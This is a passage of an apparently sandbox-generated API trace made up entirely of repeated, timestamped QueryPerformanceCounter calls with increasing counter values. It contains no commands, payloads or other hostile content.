lpPerformanceCount=0x6adfdfc*=3097317569730) returned 1 [0154.357] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097317586191) returned 1 [0154.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097319175287) returned 1 [0154.373] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097319200993) returned 1 [0154.389] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097320770982) returned 1 [0154.389] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097320787597) returned 1 [0154.405] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097322376235) returned 1 [0154.405] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097322400837) returned 1 [0154.421] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097323979950) returned 1 [0154.421] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097324001793) returned 1 [0154.437] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097325566512) returned 1 [0154.437] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097325580332) returned 1 [0154.453] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097327175052) returned 1 [0154.453] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097327192639) returned 1 [0154.469] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097328774811) returned 1 [0154.469] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097328797142) returned 1 [0154.485] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097330370893) returned 1 [0154.485] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097330388872) returned 1 [0154.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097331984095) returned 1 [0154.501] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097332018309) returned 1 [0154.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097336456254) returned 1 [0154.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097336473302) returned 1 [0154.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097336513642) returned 1 [0154.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097336528424) returned 1 [0154.549] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097336781617) returned 1 [0154.549] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097336802464) returned 1 [0154.565] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097338377529) returned 1 [0154.565] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097338415166) returned 1 [0154.581] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097339969570) returned 1 [0154.581] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097339986861) returned 1 [0154.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097341572122) returned 1 [0154.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097341588282) returned 1 [0154.613] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097343173367) returned 1 [0154.613] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097343195778) returned 1 [0154.629] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097344770888) returned 1 [0154.629] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097344788386) returned 1 [0154.645] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097346421539) returned 1 [0154.645] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097346439662) returned 1 [0154.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097348025673) returned 1 [0154.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097348043477) returned 1 [0154.677] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097349627895) returned 1 [0154.677] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097349650173) returned 1 [0154.693] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097351222339) returned 1 [0154.693] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097351245008) returned 1 [0154.709] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097352823564) returned 1 [0154.709] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097352847819) returned 1 [0154.725] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097354431123) returned 1 [0154.726] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097354460056) returned 1 [0154.741] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097356018038) returned 1 [0154.741] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097356034254) returned 1 [0154.757] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097357625479) returned 1 [0154.757] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097357648116) returned 1 [0154.774] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097359290521) returned 1 [0154.774] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097359318748) returned 1 [0154.790] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097360869361) returned 1 [0154.790] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097360885646) returned 1 [0154.806] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097362472348) returned 1 [0154.806] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097362490887) returned 1 [0154.821] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097364045683) returned 1 [0154.822] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097364061849) returned 1 [0154.837] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097365644977) returned 1 [0154.838] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097365662067) returned 1 [0154.853] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097367248981) returned 1 [0154.854] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097367271856) returned 1 [0154.869] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097368850559) returned 1 [0154.870] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097368875358) returned 1 [0154.885] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097370445567) returned 1 [0154.886] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097370468067) returned 1 [0154.901] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097372051672) returned 1 [0154.902] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097372076241) returned 1 [0154.917] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097373647732) returned 1 [0154.918] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097373666683) returned 1 [0154.934] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097375255947) returned 1 [0154.934] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097375278406) returned 1 [0154.949] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097376844897) returned 1 [0154.950] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097376863145) returned 1 [0154.965] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097378449053) returned 1 [0154.966] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097378472514) returned 1 [0154.987] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097380571321) returned 1 [0154.987] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097380589491) returned 1 [0155.002] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097382146861) returned 1 [0155.003] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097382164106) returned 1 [0155.018] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097383746248) returned 1 [0155.019] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097383762336) returned 1 [0155.034] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097385348506) returned 1 [0155.035] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097385364666) returned 1 [0155.050] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097386950287) returned 1 [0155.051] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097388711189) returned 1 [0155.069] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097388759623) returned 1 [0155.069] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097388782891) returned 1 [0155.083] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097390197100) returned 1 [0155.083] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097390214047) returned 1 [0155.100] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097391875914) returned 1 [0155.100] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097391892519) returned 1 [0155.115] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097393432760) returned 1 [0155.115] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097393453956) returned 1 [0155.132] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097395067895) returned 1 [0155.132] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097395085033) returned 1 [0155.148] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097396735431) returned 1 [0155.148] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097396753137) returned 1 [0155.163] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097398204712) returned 1 [0155.163] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097398239413) returned 1 [0155.179] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097399806818) returned 1 [0155.179] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097399832662) returned 1 [0155.195] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097401399414) returned 1 [0155.195] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097401416214) returned 1 [0155.211] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097403002262) returned 1 [0155.211] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097403040580) returned 1 [0155.227] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097404603245) returned 1 [0155.227] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097404629899) returned 1 [0155.243] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097406180615) returned 1 [0155.243] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097406203679) returned 1 [0155.259] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097407778654) returned 1 [0155.259] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097407802414) returned 1 [0155.275] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097409402369) returned 1 [0155.275] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097409435090) returned 1 [0155.291] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097410986002) returned 1 [0155.291] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097411003676) returned 1 [0155.307] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097412571587) returned 1 [0155.307] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097412593227) returned 1 [0155.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097414169707) returned 1 [0155.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097414186045) returned 1 [0155.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097415771239) returned 1 [0155.339] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097415788744) returned 1 [0155.356] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097417535316) returned 1 [0155.357] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097417560693) returned 1 [0155.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097418973441) returned 1 [0155.371] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097418993850) returned 1 [0155.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097420582286) returned 1 [0155.387] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097420609623) returned 1 [0155.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097422177134) returned 1 [0155.403] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097422199994) returned 1 [0155.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097423790123) returned 1 [0155.419] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097423814337) returned 1 [0155.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097425357575) returned 1 [0155.435] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097425374338) returned 1 [0155.450] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097426922407) returned 1 [0155.450] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097426939205) returned 1 [0155.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097428525888) returned 1 [0155.466] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097428543151) returned 1 [0155.482] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097430122191) returned 1 [0155.482] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097430141718) returned 1 [0155.498] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097431723505) returned 1 [0155.498] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097431740491) returned 1 [0155.514] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097433327687) returned 1 [0155.514] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097433350923) returned 1 [0155.530] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097434931638) returned 1 [0155.531] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097434956575) returned 1 [0155.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097436532878) returned 1 [0155.546] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097436550885) returned 1 [0155.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097438097983) returned 1 [0155.562] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097438144968) returned 1 [0155.578] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097439681958) returned 1 [0155.578] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097439698405) returned 1 [0155.594] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097441316833) returned 1 [0155.594] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097441334945) returned 1 [0155.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097442862675) returned 1 [0155.610] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097442879144) returned 1 [0155.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097444462362) returned 1 [0155.626] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097444478308) returned 1 [0155.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097446066172) returned 1 [0155.642] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097446082776) returned 1 [0155.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097447664636) returned 1 [0155.658] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097447681626) returned 1 [0155.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097449263472) returned 1 [0155.674] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097449280494) returned 1 [0155.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097450862851) returned 1 [0155.690] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097450879123) returned 1 [0155.707] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097452625833) returned 1 [0155.707] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097452646954) returned 1 [0155.723] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097454213268) returned 1 [0155.723] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097454230658) returned 1 [0155.739] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097455820259) returned 1 [0155.739] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097455841726) returned 1 [0155.755] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097457411843) returned 1 [0155.755] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097457428644) returned 1 [0155.771] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097459011366) returned 1 [0155.771] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097459027662) returned 1 [0155.787] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097460618765) returned 1 [0155.787] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097460635877) returned 1 [0155.803] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097462213413) returned 1 [0155.803] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097462229664) returned 1 [0155.819] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097463820835) returned 1 [0155.819] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097463841411) returned 1 [0155.835] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097465417942) returned 1 [0155.835] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097465439198) returned 1 [0155.851] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097467016781) returned 1 [0155.851] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097467042232) returned 1 [0155.869] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097468773182) returned 1 [0155.869] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097468813125) returned 1 [0155.883] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097470213628) returned 1 [0155.883] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097470230505) returned 1 [0155.899] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097471815941) returned 1 [0155.899] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097471832462) returned 1 [0155.915] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097473413476) returned 1 [0155.915] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097473429791) returned 1 [0155.931] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097475012295) returned 1 [0155.931] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097475028684) returned 1 [0155.947] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097476626331) returned 1 [0155.947] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097476643236) returned 1 [0155.963] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097478223297) returned 1 [0155.963] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097478247592) returned 1 [0155.987] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097480611133) returned 1 [0155.987] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097480630483) returned 1 [0156.003] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097482415908) returned 1 [0156.006] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097482482035) returned 1 [0156.019] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097483765957) returned 1 [0156.019] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097483782225) returned 1 [0156.035] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 